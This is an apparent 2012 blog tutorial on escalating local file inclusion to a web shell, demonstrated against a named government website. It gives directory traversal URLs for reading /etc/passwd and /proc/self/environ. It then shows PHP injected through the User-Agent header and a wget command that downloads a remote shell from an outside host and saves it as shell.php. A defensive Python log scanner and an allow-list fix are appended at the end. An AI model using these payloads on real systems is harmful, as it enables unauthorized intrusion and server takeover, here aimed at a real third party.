Monday, August 27, 2012

Local File Inclusion to shell upload


Tutorial provided by

Things you will need:

1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/ )
4) Mozilla Firefox

First of all, see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it).
Try to open /etc/passwd.

Example:

Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd


Ok, fine. We can open /etc/passwd.
Now try /proc/self/environ.

Example:

Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ


Now download and install User-Agent switcher.

Go to Tools > Default User-Agent > Edit User Agents.
The User-Agent editor window opens.

Now make a new user-agent:
Go to New > New User-Agent.
Now leave everything as it is except the description and the user-agent.
In the description, enter a name for it (mine is phpinfo).

In User-Agent, paste this:


Code:
<?php phpinfo();?>


Select your User-Agent in Tools > Default User Agent > PHP Info (or whatever your User-Agent is called).

Go to your site and refresh it.
Now search the page for "disable_functions" (Ctrl+F).

Mine is

Code:
disable_functions     | no value    | no value


That is good. We can spawn our shell now!

Now go back and edit your User-Agent.

Change "User-Agent" to:

Code:
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>


(What does this function do? It downloads the shell in .txt format and saves it as shell.php.)

Save it and refresh your site.

Go to http://www.yourLFIsite.com/shell.php (Mine is http://www.bislig.gov.ph/shell.php )

Voila, we have our shell up.
Enjoy.
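For the defender's side, as an added example that is not part of this tutorial: a small Python checker that flags the three traces this technique leaves in a web server's access log (traversal sequences in the query, reads of /etc/passwd or /proc/self/environ, and PHP tags inside the User-Agent header). The log lines are constructed samples in Apache "combined" format; the IPs and hostnames are placeholders.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" access-log format: ip ident user [ts] "req" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators of the LFI -> /proc/self/environ technique described above.
TRAVERSAL = re.compile(r'\.\.[/\\]')                      # ../ or ..\ in the request
SENSITIVE = re.compile(r'etc/passwd|proc/self/environ', re.I)
PHP_TAG = re.compile(r'<\?')                              # <?php ... ?> or <? ... ?> in the UA

def analyse_line(line):
    """Return the list of indicator names triggered by one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []                     # not a combined-format line; ignore it
    # Decode twice: double-encoded traversal (%252e%252e%252f) is common.
    req = unquote(unquote(m.group("req")))
    ua = unquote(m.group("ua"))
    hits = []
    if TRAVERSAL.search(req):
        hits.append("traversal")
    if SENSITIVE.search(req):
        hits.append("sensitive-file")
    if PHP_TAG.search(ua):
        hits.append("php-in-user-agent")
    return hits

def scan(lines):
    """Return (client_ip, indicators) for every suspicious line, in log order."""
    findings = []
    for line in lines:
        hits = analyse_line(line)
        if hits:
            findings.append((LOG_RE.match(line).group("ip"), hits))
    return findings

# Constructed sample log: a probe for /etc/passwd, the environ read with a PHP
# payload in the User-Agent, a benign request, and a double-encoded traversal.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Aug/2012:10:00:01 +0000] "GET /content1.php?page=5&directLinks=../../../../etc/passwd HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Aug/2012:10:00:09 +0000] "GET /content1.php?page=5&directLinks=../../../../proc/self/environ HTTP/1.1" 200 3311 "-" "<?php phpinfo();?>"
198.51.100.7 - - [27/Aug/2012:10:01:00 +0000] "GET /content1.php?page=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Aug/2012:10:02:30 +0000] "GET /content1.php?page=5&directLinks=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```

The fix on the application side is the usual one for this bug class: never pass user input to include(), and map the page parameter to a fixed allow-list of files instead.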
